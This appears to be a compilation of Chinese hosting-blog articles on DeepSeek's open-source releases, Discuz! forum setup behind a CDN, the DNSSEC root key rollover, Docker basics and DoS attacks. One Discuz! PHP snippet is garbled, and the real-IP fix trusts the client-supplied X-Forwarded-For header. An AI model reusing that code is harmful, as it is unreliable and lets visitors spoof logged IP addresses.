为帮助开发者深入理解V3/R1架构的并行策略,DeepSeek首次公开其训练与推理框架中的通信-计算重叠分析数据集。该数据集详细记录了3D并行(数据/流水线/张量并行)任务中的时空效率数据,涵盖通信延迟、计算任务调度等关键指标。 通过分析这些数据,开发者可精准定位计算与通信冲突的节点,针对性优化流水线调度策略。此举不仅降低了超大规模模型训练的调优门槛,也为社区研究提供了可复现的基准参考。项目地址:https://github.com/deepseek-ai/profile-data 技术开源推动行业协同创新 DeepSeek此次开源的三大工具直击大模型训练的两大核心痛点——硬件利用率不足与动态负载失衡。行业分析指出,DualPipe与EPLB的组合应用,可显著降低千亿级模型的训练成本,而透明化的分析数据则为开发者自主优化提供了“路线图”。 值得关注的是,这些技术已在DeepSeek内部多个千亿参数模型训练中验证,其开源代码库支持灵活适配不同硬件环境。随着AI竞赛进入“效率为王”阶段,DeepSeek通过连续四日的关键技术开源,不仅展现了中国企业的研发实力,更以开放生态推动行业协同发展。 关于DeepSeek开源周DeepSeek“开源周”计划自启动以来,已连续发布多批次大模型训练基础设施关键技术,涵盖分布式训练、高效推理、动态路由等领域。第五日收官成果将于明日揭晓,持续为全球AI开发者社区注入创新动力。 #### DeepSeek开源周重磅更新:DeepGemm矩阵库革新AI算力,FP8性能狂飙1350 TFLOPS 2月26日,国内AI领域迎来技术突破——DeepSeek在"开源周"第三日发布革命性矩阵计算库DeepGemm。这款专为FP8精度设计的矩阵乘法引擎,以300行极简代码实现超越行业标杆的性能表现,为大规模语言模型训练推理注入新动能。 ▍性能狂飙:Hopper架构实测1350+ TFLOPS基于NVIDIA Hopper GPU架构深度优化,DeepGemm在H800计算卡上实测突破1350 FP8 TFLOPS性能大关。该库特别针对DeepSeek-V3/R1模型架构优化,覆盖预填充、解码等典型推理场景,在多数矩阵尺寸下性能表现超越专业团队手工优化的Cutlass 3.6实现。 ▍技术特性:三大创新突破• 智能精度管理:采用DeepSeek-V3独创的精细化缩放技术,通过CUDA核心两级累加方案,有效解决FP8张量核心累加精度损失难题• 架构轻量化:完全基于JIT即时编译技术,零预编译依赖,核心代码精简至300行级,堪称深度学习框架的"教科书式"实现• 多模态支持:兼容标准稠密矩阵与MoE混合专家模型两种布局,为复杂AI模型提供灵活算力支持 ▍开发者友好设计项目采用模块化架构,剥离传统框架复杂的模板依赖,代码可读性堪比教学案例。开发者可快速掌握Hopper架构的FP8优化精髓,官方特别开放性能待优化场景,诚邀社区共同完善。 开源地址:https://github.com/deepseek-ai/deepgemm(注:当前版本仅支持NVIDIA Hopper架构GPU,需配合CUDA 12.8环境使用) 此次开源标志着国产AI基础设施取得重要突破,DeepGemm的极简哲学与极致性能,或将重塑深度学习计算库的开发范式。正如开发者所言:“我们相信优雅的代码不应以性能为代价,这正是DeepGemm存在的意义。” #### DeepSeek开源,华为云赚麻了! 最近AI圈最炸裂的消息,莫过于DeepSeek的开源!这个由国内团队打造的顶尖开源大模型,不仅让全球开发者疯狂打Call,更意外带火了一波国产算力——尤其是华为昇腾云服务,直接躺赢成最大赢家! 这并不是主机帮胡说,而是主机帮关注的华为云公众号从前几天开始发布了大量国内知名企业合作打造基于基于DeepSeek打造的AI服务。 君龙人寿、东阳光药、珠海传媒、天虹等这些大佬企业都纷纷跟华为合作,基于昇腾AI云服务+DeepSeek开源模型打造AI服务。 为什么这些企业现在都扎堆跟华为合作呢? 其原因也很好理解,DeepSeek出来后部署AI需要的算力需求下降了,以前如果想要部署私人AI的话,需要购买非常昂贵的英伟达算力芯片或者租用算力中心的算力服务,价格相当昂贵,主机帮以某算力租赁公司为例,8张 NVIDIA A100 80G 100M带宽的,一个月租赁费用就高达12万元。 而这配置算不上高,根本无法运行除DeepSeek外的大模型,只能运行一些参数极低的小模型,智能水平有限,花这么高的价格,却只能用一个水平极低的AI,肯定是不划算的,所以很多企业望而却步,在DeepSeek没出来前,想要部署一个满足几千几万人用的大模型,动则不需要几千万几亿人民币。 现在好了,DeepSeek出来后,企业发现只需要花几百万,甚至几十万就可以弄一个堪比chatgpt的顶尖AI了,而且由于英伟达产能一直有限,价格也非常昂贵,想要买到算力卡也是要等很久,这就便宜了华为了,由于DeepSeek不需要这么高的算力就可以运行满血版,因此,华为云也能接到大量的客户,简直躺赢。 #### DigitalOcean宣布收购CSS技巧分享网站CSS-Tricks 3月16日 消息:知名的IDC服务商DigitalOcean宣布,已经正式收购CSS技巧分享网站CSS-Tricks。 CSS Tricks是一个国外的优秀前端开发博客,主要分享使用CSS样式的技巧、经验和教程等,网站提供了6, 500 篇文章、视频、指南以及其它专注于前端开发的内容。 digitalocean则是一家成立于 2012 年的总部设置在纽约的云主机商家,目前在全球分布的数据中心有 14 个,超59. 8 万客户使用 DigitalOcean 构建服务。DigitalOcean在公告中表示,收购CSS-Tricks 后,将有助于补充DigitalOcean现有的内容库,同时进一步扩大 DigitalOcean 在前端和全栈开发人员中的影响力。 未来,CSS-Tricks 将继续作为一个独立站点运行,所有内容将继续免费并向任何人开放。CSS-Tricks 创始人 Chris Coyier 则以顾问身份支持 CSS-Tricks。Chris Coyier方面也回应称,其将作为顾问与 DigitalOcean 团队合作,然后慢慢的转向专注于自己的的其他项目。 DigitalOcean官方强调,DigitalOcean 将继续在 CSS-Tricks 上发布新的前端内容,并通过Write for DOnations计划支持现有和新的 CSS-Tricks贡献者。 #### Discourse:非常强大的开源论坛系统 Discourse 是 Stack Overflow 的联合创始人 Jeff Atwood 推出的一个新的开源论坛项目,其目的是为了改变十年未变的论坛软件。它摒弃了传统论坛的话题讨论形式、拥有自学习系统、全 Web 应用同时适用于桌面和移动终端。基于 Ruby on Rails 和 Ember.js 开发,数据库使用 PostgreSQL 和 Redis。 主机吧当初在建云加速(www.yunjiasu.cc) 的时候,要是知道这个论坛系统,肯定选他,实在是Discourse太符合现代社交论坛的要求了。 不过Discourse是基于 Ruby on Rails 和 Ember.js 开发的,如果想要搭建,需要重新买一个云服务器独立安装,搭建成本估计会上升,有需要的同学可以看下。 开源项目:https://github.com/discourse/discourse #### Discuz! Q正式发布 打造全网领先的私域流量经营工具 7月16日 消息:近日,Discuz正式推出全新的系列产品:Discuz! Q。Discuz! Q继承了Discuz! X 的社区的核心能力,增强了变现的能力,原生接入微信生态,且更适配今天移动端的交互,帮助用户碎片化的信息发布及获取。作为一个新生儿,Discuz! Q拥有完全开源、提供丰富接口、前后端分离、轻量化、数据独立可控、敏捷上云、快速变现七大能力。 据了解,官方希望通过这些能力,能够帮助创业者更高效的上线内容产品,让信息能高效准确的分享与传播,流量变现能更加简单快捷,重塑移动社区的用户体验,提供一种更可靠的信息连接与知识传播的方式。 吴洪声此前表示,Discuz! Q的目标是帮助流量大V、网红、知识付费、微信生态和移动互联网的创业者们,更轻易的完成用户沉淀和转化付费,将Discuz! Q会打造成全网领先的私域流量经营工具。 资料显示,目前,Discuz!已拥有 15 年以上的应用历史和 200 多万网站用户案例,是全球成熟度最高、覆盖率最大的论坛软件系统之一。 2010 年 8 月 23 日,康盛创想与腾讯达成收购协议,成为腾讯的全资子公司。 备注:Discuz! Q试用已开通,感兴趣的站长朋友们可以登陆看看。 前台地址:  https://ue81610d482e.discuz.run 后台地址:  https://ue81610d482e.discuz.run/admin 测试账号信息:账号:admin  密码:admin #### Discuz! X3.5 正式版发布,更新于2022年12月21日   老牌开源社区论坛程序Discuz! 更新啦,在2022年12月底,很高兴为大家带来Discuz!X3.5的正式版,正式版提供从X3.5以下版本的升级。 X3.5运行环境要求:安全提示:我们强烈建议您使用仍在开发团队支持期内的操作系统、Web服务器、PHP、数据库、内存缓存等软件,超出支持期的软件可能会对您的站点带来未知的安全隐患。 性能提示:当 MySQL < 5.7 或 MariaDB < 10.2 时, InnoDB 性能下降较为严重,因此在生产系统上运行的站点应升级版本至 MySQL >= 5.7 或 MariaDB >= 10.2 以避免此问题。 软件名称最低要求推荐版本其他事项PHP>= 5.6.07.3 - 8.2依赖 XML 扩展、 JSON 扩展、 GD 扩展 >= 1.0MySQL>= 5.5.35.7 - 8.0如使用 MariaDB ,推荐版本为 >= 10.2 X3.5核心亮点:1、支持PHP82、支持MYSQL83、支持IPV6,支持多IP库、支持CDN不同模式IP获取,且支持扩展获取模式4、支持UTF8MB4(支持emoji表情、更多字符的支持)5、支持InnoDb(云数据库已普遍推荐使用)6、支持全模块开关(包括论坛,从此Discuz!X不只是论坛,而是全方案的建站系统)7、全新的支付系统,自带微信支付、支付宝支付、QQ钱包支付,支持扩展接入更多支付体系,支持第三方调用支付8、内置安全手机底层,支持第三方SMS接口接入9、更完善、现代化的手机版10、全新的后台风格11、更完善的HTTPS支持12、HTML5全面取代Flash 另有数百项功能改进…… 官方下载地址:https://www.dismall.com/thread-14660-1-1.html #### Discuz! 论坛程序使用百度云加速CDN增速优化方案 之前就一直想写一篇关于Discuz!论坛程序使用百度云加速的优化方案,一直没写出来,主要是没有接触几个使用Discuz! 的用户,正好今天有位购买云加速的用户使用的程序是Discuz!的,主机吧就研究了下,根据自己的经验给大家分享下如何优化Discuz! 。首先确保源站正常运营,然后服务器如果开防火墙请把云加速的IP加入白名单。如果没有开就不用理他。做好这些后,我们就可以开始进行优化了。以客户网站bbs.sdgun.com.cn为例,网站特点,图片大,动态调用较高。不适合以住像织梦程序一样做全站缓存。我们需要对网站进行动静分离。首先把网站附件图片地址单独设置一条子域名,比如客户把附件地址设置成bd.sdgun.com.cn。操作方法很简单,在源空间上绑定bd.sdgun.com.cn,然后进入Discuz!系统后台,进入“全局--上传设置--基本设置”,把修改成本地附件URL地址,将 data/acttachment(部分站长的附件目录不一样按自己的修改即可)修改为http://bd.sdgun.com.cn/data/acttachment即可。设置完域名附件地址后我们开始进行百度云加速解析,进入百度云加速,添加子域名bd.sdgun.com.cn,然后得出的别名地址到域名商添加解析。添加完解析后,我们再给这个子域名添加全站缓存:进入规则自定义,添加一条bd.sdgun.com.cn/*规则具体设置如下:目标URL:“bd.sdgun.com.cn/*”;跳转:OFF;缓存颗粒设置:全部都缓存;节点缓存有效期:1周;浏览器缓存有效期:2小时;CC防护:中;其他:全ON;注意:图片延迟加载功能一定不要开,很容易出现附件加载不出来的情况,这种情况跟Discuz!附件加载有关。以上我们就完成了对图片附件资源的全站缓存,打开有附件图片的帖子我们就会发现图片加载会比之前快很多。做完以上静态资源加速后,我们再来设置整的CDN,还是以客户bbs.sdgun.com.cn为例,直接添加子域名BBS解析,然后到域名解析相应的记录解析完后我们进入云加速,加速功能,CDN设置具体设置如下:缓存颗粒设置:简单;节点缓存有效期:2小时;浏览器缓存有效期:2小时;智能压缩:JS、CSS;图片自动压缩:有损压缩;其它的默认就好设置完后,等上10分钟,我们再访问论坛看下,网站是不是访问快很多呢?需要注意的事,动态网站由于设置到首字节加载时间,所以用测试网站测试速度是不准确的,以自己本地电脑访问速度为准。以上就是主机吧对Discuz! 论坛程序使用百度云加速CDN的优化的一些见解,希望可以帮到大家,有什么问题可以留言。 #### Discuz!回来了!DNSPod创始人吴洪声(奶罩)将接手! 11月15日 消息:近日,DNSPod创始人吴洪声(奶罩)宣布Discuz!论坛回来了,即日起恢复运营。 吴洪声表示,经过一段时间的人员招聘和筹备,现在Discuz!已经准备好以新的面貌向大家重新开放。希望大家爱护论坛环境,自觉维护论坛秩序,按各个板块的要求发帖回帖。我们计划恢复的板块包括: Discuz! 官方发布:用于官方Discuz! X的信息与版本发布 Discuz!-插件和模板交流:用于插件与模板的发布宣传,同时可以对插件与模板的开发进行讨论。 Discuz!-安装使用:大家一起讨论所有关于安装使用的相关问题 Discuz!-BUG与问题交流:交流SQL错误、后门、官方原版应用功能未达到预期等问题,共同探讨解决方案 站长帮:发布付费解决的主题 同时,Discuz! X已经成立了由腾讯云、原康盛团队人员、原应用中心团队人员组成的开源委员会,对DZX未来的方向与社区代码的合并进行管理。目前这个开源管理团队人员也都是兼职,大家怀着对DZ的热情,利用自己的空闲时间为大家服务。 此外,吴洪声也透露Discuz! 将推出最新版本 Discuz! Q系列的消息,Discuz! Q系列是平行于Discuz! X系列的另一条产品线,Discuz! Q的目标是帮助流量大V、网红、知识付费、微信生态和移动互联网的创业者们,更轻易的完成用户沉淀和转化付费,计划在农历新年前后发布。 今年 5 月,Discuz!曾发布公告称,由于资源和人力投入问题,Discuz!关闭了 www.discuz.net 的发言权限,但是历史资料仍然可以查阅。 据了解,Crossday Discuz! Board(简称 Discuz!)创建于 2001 年 6 月,是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。目前,Discuz!已拥有 15 年以上的应用历史和 200 多万网站用户案例,是全球成熟度最高、覆盖率最大的论坛软件系统之一。 2010 年 8 月 23 日,康盛创想与腾讯达成收购协议,成为腾讯的全资子公司。 移动互联网时代论坛是否能找到一个适合自己的模式呢?我们拭目以待吧! #### Discuz!教程网活不下去了?站帮网停运了 玩Discuz!的站长多少都听过站帮网(zb7.com),这是一个以发布Discuz!教程的网站,可以说是业界不错的网站。这样的一个网站,今天主机吧得知,居然停运了。 其实近两年网站行业都是非常艰难的,主要原因是抖音的兴起,让很多浏览网页的人,花更多时间去看视频了,而且百度这两年也一直往站内搜索方向发展,严重挤压了网站行业的发展,主机吧博客的流量也从日IP两千,变成了现在的日IP一千多,挺惨的。 当然也不是所有的网站都变差,一些行业站还是活得非常好的,作为站长,要不变适应环境变化才是,总之一起加油吧。 #### Discuz!论坛使用百度云加速后网站头像设置不了解决办法 最近有使用Discuz!论坛程序的站开向主机吧反馈: 换完了百度云加速防御加速 网站头像设置不了了,怎么办? 其实原因是因为百度云加速CDN会默认缓存一些带动态参数请求,对一些程序来说,可能没什么问题,但是某些程序可能会引起部分功能无法正常使用,Discuz!就是其实一个。 解决办法很简单,进入百度云加速域名管理,CDN加速功能 缓存粒度设:调为基础 即可会员头像设置功能即可正常,如果你其它动态程序有问题的也可以使用同样的方法操作,希望可以帮助大家,欢迎大家关注主机吧。 #### Discuz!论坛使用百度云加速获取访客真实IP的方法 Discuz! X2修改的方法是:用Notepad+打开/source/class/class_core.php 文件,搜索“HTTP_CLIENT_IP”,定位我们要修改的代码。如下图:3、这上图中三行代码全部删除,记住只删除这三行代码,然后加入以下代码作替代。if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) AND preg_match_all(‘#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}#s’, $_SERVER['HTTP_X_FORWARDED_FOR'], if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) AND preg_match_all(‘#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}#s’, $_SERVER['HTTP_X_FORWARDED_FOR'], 4、Discuz! X2.5修改的方法是:打开/source/class/discuz/discuz_application.php文件,搜索“HTTP_CLIENT_IP”,同样找到这三行,用以上代码替换。如下图:5、最后的效果如下图:6、当然不要忘记到Discuz! 后台更新一下缓存。1、对于正在使用CDN服务的用户,找到这个文件:\source\class\discuz\discuz_application.php,搜索,在378行左右。private function _get_client_ip() { $ip = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']) AND preg_match_all('#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'], $matches)) { foreach ($matches[0] AS $xip) { if (!preg_match('#^(10|172\.16|192\.168)\.#', $xip)) { $ip = $xip; break; } } } return $ip; } 2、将这一段替换为以下代码:private function _get_client_ip() { $ip = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) AND preg_match_all('#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'], $matches)) { foreach ($matches[0] AS $xip) { if (!preg_match('#^(10|172\.16|192\.168)\.#', $xip)) { $ip = $xip; break; } } } elseif(isset($_SERVER['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } return $ip; } #### Discuz!论坛接入百度云加速后附件下载不了原因解决办法 最近有客户向主机吧反馈论坛接入百度云加速后,附近下载不了。这里主机吧来说明下,之前所以附件下载不了是因为Discuz!论坛的附件下载地址是不能缓存的,一但缓存就会出现附件下载不跳转的情况。 解决办法很简单: 进入域名功能管理-加速功能-CDN 找到缓存粒度设置:调为基础 然后我们再刷新全站缓存   即可完美解决附件下载不了的情况。解决问题了吗?如果没有解决的可以留言主机吧,欢迎多多关注主机吧哦,我们会经常更新一些网络教学帮助大家。 #### DISCUZ!论坛程序更换空间域名管理员无法登陆后台原因与解决办法 今天中午帮一客户搬家测试程序,结果这客户又换空间又换域名的,而且新域名迟迟不解新空间,搞得主机吧一直没办法正常测试,挺恼火。 而且连后台帐号密码也忘记了,辛辛苦苦把管理员帐号密码找回来了,最后还出现管理员无法登陆的情况。没办法了在网上找了半天解决方案,都没什么用,后来才发现原来他这源码做了限制域名的的操作。 原因在于config_global.php和config_global_default.php做了限制域名 $_config['cookie']['cookiedomain'] = '.XXX.COM';这里的域名是让源码后台只能在这个域名下登陆。我们只要把他去掉为$_config['cookie']['cookiedomain'] = '';就可以了。 找到方法很简单,如果没找到,真的气死人。希望可以帮助大家。 #### DNS 作者谈其起源和现状 在互联网的早期,主机和 IP 地址信息储存在斯坦福研究院维护的一个文本文件 HOSTS.TXT 中,当一台新计算机加入到网络或一台旧电脑修改了它的资料,人们需要联系斯坦福研究院,让他们手动更新文件。 想知道一台计算机 IP 地址的人也需要联系斯坦福研究院。而它每个工作日下午五点就会关闭,假日也不会开放。DNS 就是作为一种方法通过利用分布式数据库来解决这个问题。当时在南加州大学工作的 Paul Mockapetris 博士发明和设计了 DNS 系统。 Dns - domain name system, server and protocol. Internet and digital technology concept on server room background. 他说,虽然 DNS 系统设计的非常灵活,但顶级域名本身是政治皮球的一种博弈。DNS 设计的不安全是有意为之,当时的问题是需要人们接受分布式系统这个概念。 对于俄罗斯试图建造主权局域网,重建 DNS 基础设施,Mockapetris 博士称技术本身并不难,俄罗斯可以使用开源 DNS 来实现他们的意图。 而从商业角度看,对外连接仍然是重要的,即使是“防火墙”也并没有切断连接,而只是寻求控制。 #### DNS大事件:10月11日更换Root KSK,未更新将无法使用互联网 轮换Root KSK:更换DNS的信任根 9月16日,ICANN理事会通过了一项决议,指示ICANN组织按计划继续轮换Root KSK,定于2018年10月11日16:00 UTC更换Root KSK。 2018年10月11日,根密钥签名密钥(Root KSK)即将更换――这是历史上第一次,这是用于验证所有DNSSEC响应的单一信任根。还没有了解并开始使用新密钥的验证解析系统将把所有响应视作无效,因而导致它们停止回答所有查询,从而让用户无法正常访问互联网。 你准备好了吗? 引言/DNSSEC是什么? 域名系统安全扩展(DNSSEC)于1997年推出,首次描述DNSSEC的RFC2065同年发布。DNSSEC为域名系统(DNS)的使用者使用公钥加密来验证响应提供了一种方法。在1997年到2010年7月1日,DNSSEC被一些DNS授权运营商所使用。然而,当时没有一个信任锚(trust anchor),这是可用来验证响应的权威实体。2010年7月1日,互联网名称与数字地址分配机构(ICANN)、Verisign以及国家电信和信息管理局(NTIA)完成了对DNS根区域进行签名的过程。这样一来,单个信任根就可以用来验证所有DNSSEC响应,假设DNS链上的每个区域都已签名。 自2010年7月以来,DNSSEC信任根(又叫根密钥签名密钥,Root KSK)没有变过。 DNSSEC验证中其他地方使用的许多密钥已经轮换――类似网站的TLS证书,这对于任何公钥系统来说很常见。在引入目前使用的密钥KSK-2010的前后,负责维护DNS根区域的组织:互联网号码分配机构(IANA)编制了《根区域KSK运营商DNSSEC实践声明》文档。该文档概述了根区域的DNSSEC操作,呼吁5年后轮换Root KSK。与之相仿,在2013年,ICANN的安全性和稳定性咨询委员会发布了一份公告,呼吁轮换Root KSK。轮换Root KSK的过程应该在2015年开始,但直到2016年10月才开始。促使KSK-2017创建的Root KSK生成过程开启了Root KSK的轮换,原计划在2017年10月完成。 有一种自动方法可以验证解析系统以了解和安装新的Root KSK(RFC5011)。然而,验证解析系统不仅需要支持更新方法,还需要能够观察密钥至少30天,并将该密钥存储在永久存储设备中。在某些情况下,解析系统无法写入到永久存储设备,也无法保留新密钥。如上所述,不使用新密钥的验证递归解析系统将停止回答查询,从而让用户无法正常访问互联网。由于无法可靠地衡量有多少解析系统没有安装新密钥,因此ICANN理事会作出了决定:推迟部署,以便做好更多的研究和通知工作。延期一年;现在我们离2018年10月11日这个重大日子越来越近了。 诸有关方已认真考虑了轮换Root KSK的计划,包括ICANN下面的首席技术官办公室以及安全性和稳定性咨询委员会(通过ICANN托管的KSK Roll邮件列表)。意见不一,有的强烈支持今年轮换密钥,有的强烈反对。争论双方都发现需要更多的数据、外联和方法,帮助减小对最终用户造成的影响。 ICANN理事会正在考虑他们在下一次理事会会议(到时做出要不要搞的决定)之前征集的意见,会在下周的某个时间告知社区。决定公布后,我们会更新此文。 会发生什么? 如果Root KSK轮换按计划进行,信任锚Root KSK将从2018年10月11日开始由KSK-2010换成KSK-2017。这将导致响应由根DNS域名服务器来处理,返回现在与新的Root KSK联系起来的响应。由于根域名服务器的响应中设置了48小时的生存时间(TTL),因此一些最终用户可能会在10月11日到10月13日的某个时间段受到影响。受影响的时间主要取决于解析系统上的缓存到期失效的速度多快。受影响的最终用户可能一开始会遇到主机未找到错误或表明DNS解析无法正常工作的其他征兆;随着更多缓存条目到期失效,故障似乎会扩散到其他域。对于遇到故障的用户来说,使用ping之类的工具、找到IP地址而不是域名有助于排除常规的连接问题。对于管理员来说,访问资源时使用IP地址可以用作某些应用的权宜之计,直到解析故障被解决。 ICANN的首席技术官办公室及其他机构估计,由于此次轮换,Root KSK轮换将给互联用户带来不到1%的拒绝服务(DoS)。这些报告承认,由于根本上无法衡量DNS的某些方面,存在一定程度的不确定性。过去两年已作出了努力以改进衡量,但新数据不如我们预期的那样具有结论性。 我如何准备Root KSK轮换? 如果你是最终用户,就得依赖DNS服务提供商(通常是你的ISP),或公共开放解析系统服务,比如Google DNS(8.8.8.8)、Open DNS(208.67.222.222和208.67.220.220)或Quad 9(9.9.9.9),以便正确处理密钥轮换。如果用户使用Akamai的ETP、AnswerX托管平台以及最新版本的AnswerX(v2017.1或更高版本)或启用DNSSEC验证功能的Nominum产品,会发现新的Root KSK信任锚已配置好,轮换发生时,解析应该会继续顺利进行。 想测试自己会不会受Root KSK轮换的影响,第一步可以尝试访问http://dnssec-failed.org。如果你能够解析并加载网页,表明你用于测试的那台计算机未配置验证解析系统,Root KSK轮换应该对该系统没有影响。请注意,这仅验证访问URL的设备是不是在使用DNSSEC验证,物联网设备等其他设备可能使用不同的递归解析系统,没有简单的方法来测试。 对于使用验证的解析系统的用户来说,有一个IETF草案,通常名为KSK Sentinel,它定义了一组特别设计的查询,最终用户可以用这些查询来检查解析系统是否为Root KSK轮换做好了准备。已设立了网站https://www.ksk-test.net,帮助最终用户测试解析系统是否验证DNSSEC、是否支持KSK Sentinel,以及是否已配置好了新的信任锚。KSK Sentinel比较新,仅部署到了少数递归解析系统。使用这个方法好不好,就看运气了,但到目前为止,除了联系你的递归解析系统运营商外,它是唯一可用来测试递归解析系统是否为Root KSK轮换做好准备的方法了。 如果你是递归解析系统运营商,ICANN提供的网页可帮助你逐步检查及/或更新大量解析系统平台上的信任锚。运营商可能还应该考虑检查自己的平台是否支持RFC5011,这种协议可自动更新和配置新的信任猫。如果这次Root KSK轮换按计划进行,RFC5011更新将无济于事,因为该协议需要30天才能完成,因此2018年9月10日是可以启用该功能的最后一天。 此外,网络运营商应检查电子邮件,看看有没有主题行是“关于ASXXXXX中未准备好的DNSSSEC验证解析系统的重要DNS信息”的邮件,其中XXXXX换成你的自治系统(AS)编号。这类电子邮件让运营商对于出现在根域名服务器的日志中的解析系统有一番了解,这些服务器对于是否支持新的Root KSK并不确定。一些根域名服务器处理的请求常常与可能没有为Root KSK轮换做好准备的验证解析系统关联起来,这些服务器已看到出现在这些报告中的IP地址。收到这些报告的管理员应利用ICANN提供的程序来检查及/或更新解析系统。由于客户端可能通过非验证递归解析系统发出同样的查询,因此可能会出现误报。 面对Root KSK轮换,权威域名服务器的运营商受客户端使用的递归解析系统的支配,这意味着无法通过修改权威服务来纠正解析故障。 #### Docker容器的创建、启动、和停止教学 这篇文章主要介绍了Docker容器的创建、启动、和停止的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧1、容器是独立运行的一个或一组应用,及他们的运行环境。容器是Docker中的一个重要的概念。2、docker容器的启动有三种方式a.交互方式,基于镜像新建容器并启动例如我们可以启动一个容器,打印出当前的日历表[root@rocketmq-nameserver4 ~]# docker run my/python:v1 cal ##my/python:v1为镜像名和标签我们还可以通过指定参数,启动一个bash交互终端。[root@rocketmq-nameserver4 ~]# docker run -it my/python:v1 /bin/bash参数-t让Docker分配一个伪终端并绑定在容器的标准输入上,-i让容器的标准输入保持打开。使用docker run命令来启动容器,docker在后台运行的标准操作包括1.检查本地是否存在指定的镜像,不存在则从公有仓库下载 2.使用镜像创建并启动容器 3.分配一个文件系统,并在只读的镜像层外面挂载一层可读可写层 4.从宿主主机配置的网桥接口中桥接一个虚拟接口道容器中去 5.从地址池分配一个ip地址给容器 6.执行用户指定的应用程序 7.执行完毕之后容器被终止my/sinatra:v2基于training/sinatra镜像进行修改后的镜像,training/sinatra为公有仓库上的镜像。b、短暂方式,直接将一个已经终止的容器启动运行起来可以使用docker start命令,直接将一个已经终止的容器启动运行起来。[root@rocketmq-nameserver4 ~]# docker run my/python:v1 /bin/echo hello test hello test命令执行完,控制台会打印"hello test",container就终止了,不过并没有消失,可以用"docker ps -n 5 "看一下最新前5个的container,第一个就是刚刚执行过的container,可以再次执行一遍:docker start container_id不过这次控制台看不到”hello test”了,只能看到ID,用logs命令才能看得到:docker logs container_id。可以看到两个”hello test”了,因为这个container运行了两次。c、daemon方式,守护态运行即让软件作为长时间服务运行,这就是SAAS啊!例如我们启动centos后台容器,每隔一秒打印当天的日历。$ docker run -d centos /bin/sh -c "while true;do echo hello docker;sleep 1;done"启动之后,我们使用docker ps -n 5查看容器的信息要查看启动的centos容器中的输出,可以使用如下方式:$ docker logs $CONTAINER_ID ##在container外面查看它的输出 $ docker attach $CONTAINER_ID ##连接上容器实时查看:3、终止容器 使用docker stop $CONTAINER_ID来终止一个运行中的容器。并且可以使用docker ps -a来看终止状态的容器。终止状态的容器,可以使用docker start来重新启动。使用docker restart命令来重启一个容器。以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持主机吧。 #### Docker私有镜像库与阿里云对象存储 OSS 在本篇文章中我们给大家分享了关于Docker私有镜像库与阿里云对象存储 OSS的相关知识点内容,有需要的朋友们参考下。 Docker私有镜像库 Docker 私有镜像库与阿里云对象存储 OSS 镜像管理是 Docker 的核心,为了满足企业或组织内部分享镜像,Docker 官方在 Github上 建立了一个开源项目 docker-registry,专门用于自建 Docker 的私有镜像库。 快速启动支持阿里云对象存储 OSS 的 docker-registry 您可以从 https://github.com/docker/docker-registry 下载并安装 docker-registry,通过 pip 安装 OSS driver: pip install docker-registry-driver-alioss   运行 docker registry docker run -e OSS_BUCKET=-e STORAGE_PATH=/docker/ -e OSS_KEY=-e OSS_SECRET=-p 5000:5000 -d chrisjin/registry:ali_oss 配置 config.yml: ```local: &local <<: *common storage: alioss storage_path: _env:STORAGE_PATH:/devregistry/ oss_bucket: _env:OSS_BUCKET[:default_value] oss_accessid: _env:OSS_KEY[:your_access_id] oss_accesskey: _env:OSS_SECRET[:your_access_key]``` 启动 docker-registry: DOCKER_REGISTRY_CONFIG=[your_config_path] gunicorn -k gevent -b 0.0.0.0:5000 -w 1 docker_registry.wi:application 以上就是本次给大家介绍Docker私有镜像库与阿里云对象存储 OSS的全部内容和步骤,感谢大家主机吧的支持。 #### DoS攻击与DDoS攻击有何区别 迄今为止,仍然有很多用户,对于什么是“DoS攻击”,什么是“DDoS攻击”,还傻傻分不清楚。我们只有客观、深入地认识和了解这两种攻击的原理、区别与联系,才能更好地做好相应的防范措施。今天,就给各位用户具体讲解一下DoS攻击与DDoS攻击的区别与联系,这两种攻击方式,哪个对于目标主机的危害和破坏性更大? 一、什么是DoS攻击? DoS是“Denial of Service”的简称,中文意思即“拒绝服务”,造成DoS的攻击行为被称为“DoS攻击”,其目的是使计算机/服务器或网络无法提供正常的服务。最常见的DoS攻击有“计算机网络的带宽攻击”和“连通性攻击”。 DoS攻击,是指故意攻击网络协议实现的缺陷,或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统、服务系统停止响应甚至崩溃,而在此攻击中并不包括侵入目标服务器或目标网络设备。这些服务资源包括“网络带宽,文件系统空间容量,开放的进程或者允许的连接”。这种攻击会导致资源的匮乏,无论计算机的CPU处理速度有多快、内存容量有多大、网络带宽的速度有多快,都无法避免这种攻击带来的后果 从网络攻击的各种方法和所产生的破坏情况来看,DoS算是一种很简单但又很有效的进攻方式。它的目的就是拒绝你的服务访问,破坏系统的正常运行,最终它会致使你的部分Internet连接和网络系统失效。DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务。 二、DoS攻击的原理: 